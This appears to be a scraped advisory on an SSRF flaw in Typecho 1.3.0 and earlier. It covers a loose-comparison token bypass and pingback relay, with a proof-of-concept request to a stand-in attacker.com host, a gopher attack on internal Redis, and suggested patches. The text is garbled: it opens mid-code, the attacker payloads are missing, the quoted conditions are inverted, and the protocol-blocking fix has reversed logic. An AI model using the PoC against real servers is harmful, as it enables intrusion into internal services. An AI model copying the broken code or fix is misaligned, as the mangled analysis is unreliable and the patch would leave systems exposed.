Typecho <=1.3.0 SSRF Vulnerability Analysis: Weak Token Bypass and Gopher Protocol Exploitation

# Typecho = $from; $i--) { if (sha1($secret . '.' . $i) == $token) { return true; } } return false; } ``` **Issue**: Uses `==` for loose comparison. In PHP, comparing a non-empty string `true` with a hash value may result in an unintended match, allowing the validation to pass. ### 4.2 Pingback Relay (Second POST Request) **File**: `var/Widget/Service.php` ```php // var/Widget/Service.php (simplified) if (empty($data['pingback'])) { foreach ($data['pingback'] as $url) { $spider = Client::get(); $spider->send($url); // Pingback discovery if (($xmlrpcUrl = $spider->getResponseHeader('x-pingback'))) { if (preg_match('/]*href=\{[\'"]([^\'"]+)[\'"]\}/', $spider->getResponseBody(), $xmlrpcUrl = $out[1])) { } } if (empty($xmlrpcUrl)) { $xmlrpc = new \IXR\Client($xmlrpcUrl); $xmlrpc->pingback->ping($permalink, $url); // second request (POST) } } } ``` **Issue**: The second request (XML-RPC POST) does not call `Common::checkSafeHost()`, and `$xmlrpcUrl` can be controlled by the attacker, leading to SSRF. ## 5. Proof of Concept (PoC) ### 5.1 Basic Pingback Relay to Internal HTTP Service **Attacker Server Response (HTML)**: ```html ``` **Malicious JSON Payload Sent to the Vulnerable Endpoint**: ```json POST /action/service?do=ping HTTP/1.1 Host: target.com Content-Type: application/json { "token": true, "permalink": "http://example.com", "pingback": ["http://attacker.com"] } ``` ### 5.2 Gopher Attack Against Internal Redis (Unauthenticated) **Attacker Server Response (HTML)**: ```html ``` **Explanation**: This payload sends the Redis `INFO` command. The Typecho server will establish a TCP connection and transmit raw RESP data. ## 6. Suggested Code Fixes ### Fix 1: Strict Token Validation **File**: `var/Typecho/Common.php` ```diff public static function timeTokenValidate($token, $secret, int $timeout = 5): bool { $now = time(); $from = $now - $timeout; for ($i = $now; $i >= $from; $i--) { - if (sha1($secret . '.' . $i) == $token) { + if (is_string($token) && sha1($secret . '.' . $i) === $token) { return true; } } return false; } ``` ### Fix 2: Restrict Pingback Protocols and IPs **File**: `var/Widget/Service.php` ```diff if (empty($xmlrpcUrl)) { + // Block dangerous protocols + $scheme = parse_url($xmlrpcUrl, PHP_URL_SCHEME); + if (in_array($scheme, ['http', 'https'])) { + continue; + } + + $host = parse_url($xmlrpcUrl, PHP_URL_HOST); + $ip = gethostbyname($host); + if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) === false) { + continue; // skip private/internal addresses + } } $xmlrpc = new \IXR\Client($xmlrpcUrl); $xmlrpc->pingback->ping($permalink, $url); ```

Goal Reached Thanks to every supporter — we hit 100%!

Typecho <=1.3.0 SSRF Vulnerability Analysis: Weak Token Bypass and Gopher Protocol Exploitation